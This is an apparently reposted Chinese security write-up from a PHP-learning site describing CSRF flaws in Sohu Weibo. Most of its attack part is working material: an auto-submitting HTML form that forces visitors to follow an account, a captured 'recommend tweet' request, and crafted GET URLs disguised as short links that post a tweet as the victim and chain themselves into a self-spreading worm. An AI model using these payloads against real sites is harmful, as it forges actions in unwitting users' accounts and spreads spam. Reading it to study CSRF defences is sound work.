搜狐微博CSRF蠕虫一触即发+CSRF刷粉丝 - 网站安全-自学php网

主页 > 后端 > 网站安全 >

搜狐微博CSRF蠕虫一触即发+CSRF刷粉丝 - 网站安全

来源：自学PHP网时间：2015-04-17 11:59 作者：阅读:次

[导读] 1）CSRF刷粉丝搜狐对于xxx.t.sohu.com这样的域名均未校验referer，例子POC如下：htmlbodyform id=se55i0n name=se55i0n action=http://ourhome.t.sohu.com/follow/addfollows method=POSTinp......

1）CSRF刷粉丝

搜狐对于“xxx.t.sohu.com”这样的域名均未校验referer，例子POC如下：

<body>

<form id="se55i0n" name="se55i0n" action="http://ourhome.t.sohu.com/follow/addfollows" method="POST">

<input type="text" name="friendids" value="3262276" />

<input type="text" name="uid" value="3262276" />

<input type="submit" value="submit" />

</form>

<script>

document.se55i0n.submit();

</script>

</body>

</html>

2）CSRF蠕虫

2.1）无意间发现搜狐，有个像分析推荐某某微博的功能，点击推荐搜狐官方微博并抓包；

POST /user/recommend/tweet HTTP/1.1

Host: t.sohu.com

Proxy-Connection: keep-alive

Content-Length: 184

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://t.sohu.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22

Content-Type: application/x-www-form-urlencoded

Referer: http://t.sohu.com/following?cur=1&gid=0

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

Cookie: ...

msg=%5B%u8272%u8FF7%u8FF7%5D%20csrf%u6D4B%u8BD5@%u641C%u72D0%u5FAE%u535A%u5B98%u65B9%20%u7684%u5FAE%u535A%u4E0D%u9519%uFF0C%u63A8%u8350%u5927%u5BB6%u53BB%u770B%u770B%uFF01&uid=31963453

2.2)试着改为GET请求，居然成功了（太不应该了），请求成功后会发送一条微博；

看测试效果；

2.3）经过后面的测试，发现“msg”的内容和uid参数也是能够完全掌控的，所以这就给了我们机会来小玩一次csrf蠕虫。将下面的GET请求伪装成一个短地址，再配上诱人的内容；

http://t.sohu.com/user/recommend/tweet?msg=%u5251%u5fc3%u679c%u7167%uff0c%u901f%u5ea6%u56f4%u89c2%uff01&uid=1521422610

看效果图，：D

2.4）好吧，想让它多传播几次，我们只需要将上面的转换好了的短地址再出入到msg内容里，并将其再转换地址，这样就具备了2次传播的功能，当然可不止这么一种玩法哟；

http://t.sohu.com/user/recommend/tweet?msg=%u5251%u5fc3%u679c%u7167%uff0c%u901f%u5ea6%u56f4%u89c2%uff01http://url.cn/DTqtgI&uid=1521422610

哈哈，我们还是看效果吧（想几次传播你说了算）；

2.5）一个较完整的二次传播测试效果，哈哈（发个微博诱惑大家点击，用户点击后形成第一次传播，用户的粉丝再点击形成第二次传播，当然还可以第三次、第四次....）

PS：仅仅自己测试，我木有粉丝哈哈！

Free Hosting Manager V2.0.2多个sql注射 - 网站安全 - 自

MongoDB服务器端的JavaScript注入(官方已修复) - 网站

最新评论

加载更多~~

添加评论

更多文章推荐

硬盘接口技术详解 - Windows操作系统 - 自学php 2015-04-17
XP丢失还原点终极解决办法 - Windows操作系统 - 自 2015-04-17
Win2000 下安装JSP程序支持 - Windows操作系统 - 自学 2015-04-17
web安全之信息刺探防范（下） - 网站安全 - 自学 2015-04-17
网站域名被劫持的原因分析和应对方法 - 网站安 2015-04-16
rivettracker <=1.03多个sql注射缺陷及修复 - 网站安 2015-04-17
Access数据库基于时间盲注的实现 - 网站安全 - 自 2015-04-16
phpshe不花钱直接完成订单支付 - 网站安全 - 自学 2015-04-17
115游戏post型sql注入可获得用户详细信息 - 网站安 2015-04-17
Dolibarr CMS v3.2.0 Alpha文件包含及修复 - 网站安全 2015-04-17

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论